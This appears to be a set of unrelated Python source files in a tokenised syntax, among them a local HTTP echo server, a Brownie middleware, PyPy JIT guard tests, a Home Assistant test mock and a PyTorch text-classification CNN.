<import_from_stmt>http.server HTTPServer BaseHTTPRequestHandler<class_stmt>TestHandler(BaseHTTPRequestHandler)<block_start><def_stmt>_print_request_data self<block_start>content_length=self.headers['Content-Length']<line_sep>print("Content-length: {}".format(content_length))<line_sep>data=self.rfile.read(int(content_length))<line_sep>print(data.decode('utf-8'))<block_end><def_stmt>_send_200 self<block_start>self.send_response(200)<line_sep>self.send_header('Content-type' 'text/html')<line_sep>self.end_headers()<block_end><def_stmt>do_POST self *args **kwargs<block_start>print('POST request received')<line_sep>self._print_request_data()<line_sep>self._send_200()<block_end><def_stmt>do_PUT self *args **kwargs<block_start>print("PUT request received")<line_sep>self._print_request_data()<line_sep>self._send_200()<block_end><block_end><def_stmt>run server_class=HTTPServer handler_class=TestHandler<block_start>server_address=('' 8000)<line_sep>httpd=server_class(server_address handler_class)<line_sep>httpd.serve_forever()<block_end>run()<line_sep>
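# Hypothetical manual check (an addition, not part of the original script): with the server listening on
# port 8000, a request such as
#   curl -X POST -d 'hello=world' http://localhost:8000/
# should make the handler print the Content-Length and body, and return an empty 200 response.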
|
<import_from_stmt>typing Callable Dict List Optional<import_from_stmt>web3 Web3<import_from_stmt>web3.exceptions ExtraDataLengthError<import_from_stmt>web3.middleware geth_poa_middleware<import_from_stmt>brownie.network.middlewares BrownieMiddlewareABC<class_stmt>GethPOAMiddleware(BrownieMiddlewareABC)<block_start>@classmethod<def_stmt>get_layer cls w3:Web3 network_type:str<arrow>Optional[int]<block_start><try_stmt><block_start>w3.eth.get_block("latest")<line_sep><return><none><block_end><except_stmt>ExtraDataLengthError<block_start><return>-1<block_end><block_end><def_stmt>process_request self make_request:Callable method:str params:List<arrow>Dict<block_start>middleware_fn=geth_poa_middleware(make_request self.w3)<line_sep><return>middleware_fn(method params)<block_end><block_end>
|
<import_stmt>pytest<line_sep>ignored_warnings=["ignore:torch.tensor results are registered as constants in the trace." "ignore:Converting a tensor to a Python boolean might cause the trace to be incorrect." "ignore:Converting a tensor to a Python float might cause the trace to be incorrect." "ignore:Using or importing the ABCs from" ]<line_sep>pytestmark=pytest.mark.filterwarnings(*ignored_warnings)<line_sep>
|
<import_from_stmt>rest_framework status viewsets<import_from_stmt>rest_framework.response Response<import_from_stmt>rest_framework mixins<import_from_stmt>modelchimp.models.experiment Experiment<import_from_stmt>modelchimp.api_permissions HasProjectMembership<import_from_stmt>rest_framework.permissions IsAuthenticated<class_stmt>ExperimentMetricAPI(mixins.RetrieveModelMixin viewsets.GenericViewSet)<block_start>queryset=Experiment.objects.all()<line_sep>permission_classes=(IsAuthenticated HasProjectMembership)<def_stmt>retrieve self request model_id *args **kwargs<block_start>instance=self.get_queryset().get(id=model_id)<line_sep>result=dict()<line_sep>result['summary']=[]<line_sep>result['metric']=instance.metrics<line_sep>result['duration']=instance.durations<if_stmt><not>result['metric']<block_start><return>Response(result status=status.HTTP_200_OK)<block_end><for_stmt>metric result['metric']['metric_list']# Get the max and min value
<block_start>metric_max=0<line_sep>metric_min=0<for_stmt>i,m enumerate(result['metric']['evaluation'][metric])<block_start>current_value=m['value']<if_stmt>i<eq>0<block_start>metric_max=current_value<line_sep>metric_min=current_value<line_sep><continue><block_end><if_stmt>current_value<g>metric_max<block_start>metric_max=current_value<block_end><if_stmt>current_value<l>metric_min<block_start>metric_min=current_value<block_end><block_end>metric_dict=dict()<line_sep>metric_dict['name']=metric<line_sep>metric_dict['max']=metric_max<line_sep>metric_dict['min']=metric_min<line_sep>result['summary'].append(metric_dict)<block_end><return>Response(result status=status.HTTP_200_OK)<block_end><block_end>
|
<import_stmt>FWCore.ParameterSet.Config<as>cms<line_sep>pfIsolatedMuons=cms.EDFilter("PFCandidateFwdPtrCollectionStringFilter" src=cms.InputTag("pfMuonsFromVertex") cut=cms.string("pt > 5 & muonRef.isAvailable() & "<concat>"muonRef.pfIsolationR04().sumChargedHadronPt + "<concat>"muonRef.pfIsolationR04().sumNeutralHadronEt + "<concat>"muonRef.pfIsolationR04().sumPhotonEt "<concat>" < 0.15 * pt ") makeClones=cms.bool(<true>))<line_sep>
|
"""Representation of a WeMo OutdoorPlug device."""<import_from_stmt>.switch Switch<class_stmt>OutdoorPlug(Switch)<block_start>"""Representation of a WeMo Motion device."""<block_end>
|
<import_from_stmt>rpython.jit.metainterp compile<import_from_stmt>rpython.jit.metainterp.history Const<import_from_stmt>rpython.jit.metainterp.optimizeopt.dependency DependencyGraph IndexVar <import_from_stmt>rpython.jit.metainterp.optimizeopt.guard GuardStrengthenOpt Guard <import_from_stmt>rpython.jit.metainterp.optimizeopt.test.test_schedule SchedulerBaseTest<import_from_stmt>rpython.jit.metainterp.optimizeopt.test.test_vecopt FakeLoopInfo<import_from_stmt>rpython.jit.metainterp.resoperation rop ResOperation InputArgInt <class_stmt>FakeMemoryRef(object)<block_start><def_stmt>__init__ self array iv<block_start>self.index_var=iv<line_sep>self.array=array<block_end><def_stmt>is_adjacent_to self other<block_start><if_stmt>self.array<is><not>other.array<block_start><return><false><block_end>iv=self.index_var<line_sep>ov=other.index_var<line_sep>val=(int(str(ov.var)[1:])-int(str(iv.var)[1:]))<line_sep># i0 and i1 are adjacent
# i1 and i0 ...
# but not i0, i2
# ...
<return>abs(val)<eq>1<block_end><block_end><class_stmt>FakeOp(object)<block_start><def_stmt>__init__ self cmpop<block_start>self.boolinverse=ResOperation(cmpop [box(0) box(0)] <none>).boolinverse<line_sep>self.cmpop=cmpop<block_end><def_stmt>getopnum self<block_start><return>self.cmpop<block_end><def_stmt>getarg self index<block_start><if_stmt>index<eq>0<block_start><return>'lhs'<block_end><elif_stmt>index<eq>1<block_start><return>'rhs'<block_end><else_stmt><block_start><assert_stmt>0<block_end><block_end><block_end><class_stmt>FakeResOp(object)<block_start><def_stmt>__init__ self opnum<block_start>self.opnum=opnum<block_end><def_stmt>getopnum self<block_start><return>self.opnum<block_end><block_end><def_stmt>box value<block_start><return>InputArgInt(value)<block_end><def_stmt>const value<block_start><return>Const._new(value)<block_end><def_stmt>iv value coeff=(1 1 0)<block_start>var=IndexVar(value)<line_sep>var.coefficient_mul=coeff[0]<line_sep>var.coefficient_div=coeff[1]<line_sep>var.constant=coeff[2]<line_sep><return>var<block_end><def_stmt>guard opnum<block_start><def_stmt>guard_impl cmpop lhs rhs<block_start>guard=Guard(0 FakeResOp(opnum) FakeOp(cmpop) {'lhs':lhs 'rhs':rhs})<line_sep><return>guard<block_end><return>guard_impl<block_end>guard_true=guard(rop.GUARD_TRUE)<line_sep>guard_false=guard(rop.GUARD_FALSE)<del_stmt>guard<class_stmt>TestGuard(SchedulerBaseTest)<block_start><def_stmt>optguards self loop user_code=<false><block_start>info=FakeLoopInfo(loop)<line_sep>info.snapshot(loop)<for_stmt>op loop.operations<block_start><if_stmt>op.is_guard()<block_start>op.setdescr(compile.CompileLoopVersionDescr())<block_end><block_end>dep=DependencyGraph(loop)<line_sep>opt=GuardStrengthenOpt(dep.index_vars)<line_sep>opt.propagate_all_forward(info loop user_code)<line_sep><return>opt<block_end><def_stmt>assert_guard_count self loop count<block_start>guard=0<for_stmt>op loop.operations+loop.prefix<block_start><if_stmt>op.is_guard()<block_start>guard<augadd>1<block_end><block_end><if_stmt>guard<ne>count<block_start>self.debug_print_operations(loop)<block_end><assert_stmt>guard<eq>count<block_end><def_stmt>assert_contains_sequence self loop instr<block_start><class_stmt>Glob(object)<block_start>next=<none><line_sep>prev=<none><def_stmt>__repr__ self<block_start><return>'*'<block_end><block_end><import_from_stmt>rpython.jit.tool.oparser OpParser default_fail_descr<line_sep>parser=OpParser(instr self.cpu self.namespace <none> default_fail_descr <true> <none>)<line_sep>parser.vars={arg.repr_short(arg._repr_memo):arg<for>arg loop.inputargs}<line_sep>operations=[]<line_sep>last_glob=<none><line_sep>prev_op=<none><for_stmt>line instr.splitlines()<block_start>line=line.strip()<if_stmt>line.startswith("#")<or>line<eq>""<block_start><continue><block_end><if_stmt>line.startswith("...")<block_start>last_glob=Glob()<line_sep>last_glob.prev=prev_op<line_sep>operations.append(last_glob)<line_sep><continue><block_end>op=parser.parse_next_op(line)<if_stmt>last_glob<is><not><none><block_start>last_glob.next=op<line_sep>last_glob=<none><block_end>operations.append(op)<block_end><def_stmt>check op candidate rename<block_start>m=0<if_stmt>isinstance(candidate Glob)<block_start><if_stmt>candidate.next<is><none><block_start><return>0# consumes the rest
<block_end><if_stmt>op.getopnum()<ne>candidate.next.getopnum()<block_start><return>0<block_end>m=1<line_sep>candidate=candidate.next<block_end><if_stmt>op.getopnum()<eq>candidate.getopnum()<block_start><for_stmt>i,arg enumerate(op.getarglist())<block_start>oarg=candidate.getarg(i)<if_stmt>arg<in>rename<block_start><assert_stmt>rename[arg].same_box(oarg)<block_end><else_stmt><block_start>rename[arg]=oarg<block_end><block_end><if_stmt><not>op.returns_void()<block_start>rename[op]=candidate<block_end>m<augadd>1<line_sep><return>m<block_end><return>0<block_end>j=0<line_sep>rename={}<line_sep>ops=loop.finaloplist()<for_stmt>i,op enumerate(ops)<block_start>candidate=operations[j]<line_sep>j<augadd>check(op candidate rename)<block_end><if_stmt>isinstance(operations[-1] Glob)<block_start><assert_stmt>j<eq>len(operations)-1 self.debug_print_operations(loop)<block_end><else_stmt><block_start><assert_stmt>j<eq>len(operations) self.debug_print_operations(loop)<block_end><block_end><def_stmt>test_basic self<block_start>loop1=self.parse_trace("""
i10 = int_lt(i1, 42)
guard_true(i10) []
i101 = int_add(i1, 1)
i102 = int_lt(i101, 42)
guard_true(i102) []
""")<line_sep>opt=self.optguards(loop1)<line_sep>self.assert_guard_count(loop1 1)<line_sep>self.assert_contains_sequence(loop1 """
...
i101 = int_add(i1, 1)
i12 = int_lt(i101, 42)
guard_true(i12) []
...
""")<block_end><def_stmt>test_basic_sub self<block_start>loop1=self.parse_trace("""
i10 = int_gt(i1, 42)
guard_true(i10) []
i101 = int_sub(i1, 1)
i12 = int_gt(i101, 42)
guard_true(i12) []
""")<line_sep>opt=self.optguards(loop1)<line_sep>self.assert_guard_count(loop1 1)<line_sep>self.assert_contains_sequence(loop1 """
...
i101 = int_sub(i1, 1)
i12 = int_gt(i101, 42)
guard_true(i12) []
...
""")<block_end><def_stmt>test_basic_mul self<block_start>loop1=self.parse_trace("""
i10 = int_mul(i1, 4)
i20 = int_lt(i10, 42)
guard_true(i20) []
i12 = int_add(i10, 1)
i13 = int_lt(i12, 42)
guard_true(i13) []
""")<line_sep>opt=self.optguards(loop1)<line_sep>self.assert_guard_count(loop1 1)<line_sep>self.assert_contains_sequence(loop1 """
...
i101 = int_mul(i1, 4)
i12 = int_add(i101, 1)
i13 = int_lt(i12, 42)
guard_true(i13) []
...
""")<block_end><def_stmt>test_compare self<block_start>key=box(1)<line_sep>incomparable=(<false> 0)<line_sep># const const
<assert_stmt>iv(const(42)).compare(iv(const(42)))<eq>(<true> 0)<assert_stmt>iv(const(-400)).compare(iv(const(-200)))<eq>(<true> -200)<assert_stmt>iv(const(0)).compare(iv(const(-1)))<eq>(<true> 1)<line_sep># var const
<assert_stmt>iv(key coeff=(1 1 0)).compare(iv(const(42)))<eq>incomparable<assert_stmt>iv(key coeff=(5 70 500)).compare(iv(const(500)))<eq>incomparable<line_sep># var var
<assert_stmt>iv(key coeff=(1 1 0)).compare(iv(key coeff=(1 1 0)))<eq>(<true> 0)<assert_stmt>iv(key coeff=(1 7 0)).compare(iv(key coeff=(1 7 0)))<eq>(<true> 0)<assert_stmt>iv(key coeff=(4 7 0)).compare(iv(key coeff=(3 7 0)))<eq>incomparable<assert_stmt>iv(key coeff=(14 7 0)).compare(iv(key coeff=(2 1 0)))<eq>(<true> 0)<assert_stmt>iv(key coeff=(14 7 33)).compare(iv(key coeff=(2 1 0)))<eq>(<true> 33)<assert_stmt>iv(key coeff=(15 5 33)).compare(iv(key coeff=(3 1 33)))<eq>(<true> 0)<block_end><def_stmt>test_imply_basic self<block_start>key=box(1)<line_sep># if x < 42 <=> x < 42
g1=guard_true(rop.INT_LT iv(key coeff=(1 1 0)) iv(const(42)))<line_sep>g2=guard_true(rop.INT_LT iv(key coeff=(1 1 0)) iv(const(42)))<assert_stmt>g1.implies(g2)<assert_stmt>g2.implies(g1)<line_sep># if x+1 < 42 => x < 42
g1=guard_true(rop.INT_LT iv(key coeff=(1 1 1)) iv(const(42)))<line_sep>g2=guard_true(rop.INT_LT iv(key coeff=(1 1 0)) iv(const(42)))<assert_stmt>g1.implies(g2)<assert_stmt><not>g2.implies(g1)<line_sep># if x+2 < 42 => x < 39
# counter: 39+2 < 42 => 39 < 39
g1=guard_true(rop.INT_LT iv(key coeff=(1 1 2)) iv(const(42)))<line_sep>g2=guard_true(rop.INT_LT iv(key coeff=(1 1 0)) iv(const(39)))<assert_stmt><not>g1.implies(g2)<assert_stmt><not>g2.implies(g1)<line_sep># if x+2 <= 42 => x <= 43
g1=guard_true(rop.INT_LE iv(key coeff=(1 1 2)) iv(const(42)))<line_sep>g2=guard_true(rop.INT_LE iv(key coeff=(1 1 0)) iv(const(43)))<assert_stmt>g1.implies(g2)<assert_stmt><not>g2.implies(g1)<line_sep># if x*13/3+1 <= 0 => x*13/3 <= -1
# is true, but the implies method is not smart enough
g1=guard_true(rop.INT_LE iv(key coeff=(13 3 1)) iv(const(0)))<line_sep>g2=guard_true(rop.INT_LE iv(key coeff=(13 3 0)) iv(const(-1)))<assert_stmt><not>g1.implies(g2)<assert_stmt><not>g2.implies(g1)<line_sep># > or >=
# if x > -55 => x*2 > -44
# counter: -44 > -55 (True) => -88 > -44 (False)
g1=guard_true(rop.INT_GT iv(key coeff=(1 1 0)) iv(const(-55)))<line_sep>g2=guard_true(rop.INT_GT iv(key coeff=(2 1 0)) iv(const(-44)))<assert_stmt><not>g1.implies(g2)<assert_stmt><not>g2.implies(g1)<line_sep># if x*2/2 > -44 => x*2/2 > -55
g1=guard_true(rop.INT_GE iv(key coeff=(2 2 0)) iv(const(-44)))<line_sep>g2=guard_true(rop.INT_GE iv(key coeff=(2 2 0)) iv(const(-55)))<assert_stmt>g1.implies(g2)<assert_stmt><not>g2.implies(g1)<block_end><def_stmt>test_imply_coeff self<block_start>key=box(1)<line_sep>key2=box(2)<line_sep># if x > y * 9/3 => x > y
# counter: x = -2, y = -1, -2 > -3 => -2 > -1, True => False
g1=guard_true(rop.INT_GT iv(key coeff=(1 1 0)) iv(box(1) coeff=(9 3 0)))<line_sep>g2=guard_true(rop.INT_GT iv(key coeff=(1 1 0)) iv(box(1) coeff=(1 1 0)))<assert_stmt><not>g1.implies(g2)<assert_stmt><not>g2.implies(g1)<line_sep># if x > y * 15/5 <=> x > y * 3
g1=guard_true(rop.INT_GT iv(key coeff=(1 1 0)) iv(key2 coeff=(15 5 0)))<line_sep>g2=guard_true(rop.INT_GT iv(key coeff=(1 1 0)) iv(key2 coeff=(3 1 0)))<assert_stmt>g1.implies(g2)<assert_stmt>g2.implies(g1)<line_sep># x >= y => x*3-5 >= y
# counter: 1 >= 0 => 1*3-5 >= 0 == -2 >= 0, True => False
g1=guard_true(rop.INT_GE iv(key coeff=(1 1 0)) iv(key2))<line_sep>g2=guard_true(rop.INT_GE iv(key coeff=(3 1 -5)) iv(key2))<assert_stmt><not>g1.implies(g2)<assert_stmt><not>g2.implies(g1)<line_sep># guard false inverts >= to <
# x < y => x*3-5 < y
# counter: 3 < 4 => 3*3-5 < 4 == 4 < 4, True => False
g1=guard_false(rop.INT_GE iv(key coeff=(1 1 0)) iv(key2))<line_sep>g2=guard_false(rop.INT_GE iv(key coeff=(3 1 -5)) iv(key2))<assert_stmt><not>g1.implies(g2)<assert_stmt><not>g2.implies(g1)<line_sep># x <= y => x*3-5 > y
# counter: 3 <= 4 => 3*3-5 > 4 == 4 > 4, True => False
g1=guard_false(rop.INT_GT iv(key coeff=(1 1 0)) iv(key2))<line_sep>g2=guard_true(rop.INT_GT iv(key coeff=(3 1 -5)) iv(key2))<assert_stmt><not>g1.implies(g2)<assert_stmt><not>g2.implies(g1)<block_end><def_stmt>test_collapse self<block_start>loop1=self.parse_trace("""
i10 = int_gt(i1, 42)
guard_true(i10) []
i11 = int_add(i1, 1)
i12 = int_gt(i11, i2)
guard_true(i12) []
""")<line_sep>opt=self.optguards(loop1 <true>)<line_sep>self.assert_guard_count(loop1 2)<line_sep>self.assert_contains_sequence(loop1 """
...
i100 = int_ge(42, i2)
guard_true(i100) []
...
i40 = int_gt(i1, 42)
guard_true(i40) []
...
""")<block_end><block_end>
|
"""Tests for the Nina integration."""<import_stmt>json<import_from_stmt>typing Any<import_from_stmt>tests.common load_fixture<def_stmt>mocked_request_function url:str<arrow>dict[str Any]<block_start>"""Mock of the request function."""<line_sep>dummy_response:dict[str Any]=json.loads(load_fixture("sample_warnings.json" "nina"))<line_sep>dummy_response_details:dict[str Any]=json.loads(load_fixture("sample_warning_details.json" "nina"))<if_stmt>url<eq>"https://warnung.bund.de/api31/dashboard/083350000000.json"<block_start><return>dummy_response<block_end>warning_id=url.replace("https://warnung.bund.de/api31/warnings/" "").replace(".json" "")<line_sep><return>dummy_response_details[warning_id]<block_end>
|
<import_stmt>torch<import_stmt>torch.nn<as>nn<import_stmt>torch.nn.functional<as>F<class_stmt>CNN_Text(nn.Module)<block_start><def_stmt>__init__ self args<block_start>super(CNN_Text self).__init__()<line_sep>self.args=args<line_sep>embed_num=args.embed_num<line_sep>embed_dim=args.embed_dim<line_sep>class_num=args.class_num<line_sep>Ci=1<line_sep>kernel_num=args.kernel_num<line_sep>kernel_sizes=args.kernel_sizes<line_sep>self.embed=nn.Embedding(embed_num embed_dim)<line_sep>self.convs_list=nn.ModuleList([nn.Conv2d(Ci kernel_num (kernel_size embed_dim))<for>kernel_size kernel_sizes])<line_sep>self.dropout=nn.Dropout(args.dropout)<line_sep>self.fc=nn.Linear(len(kernel_sizes)<times>kernel_num class_num)<block_end><def_stmt>forward self x<block_start>x=self.embed(x)<line_sep>x=x.unsqueeze(1)<line_sep>x=[F.relu(conv(x)).squeeze(3)<for>conv self.convs_list]<line_sep>x=[F.max_pool1d(i i.size(2)).squeeze(2)<for>i x]<line_sep>x=torch.cat(x 1)<line_sep>x=self.dropout(x)<line_sep>x=x.view(x.size(0) -1)<line_sep>logit=self.fc(x)<line_sep><return>logit<block_end><block_end>
|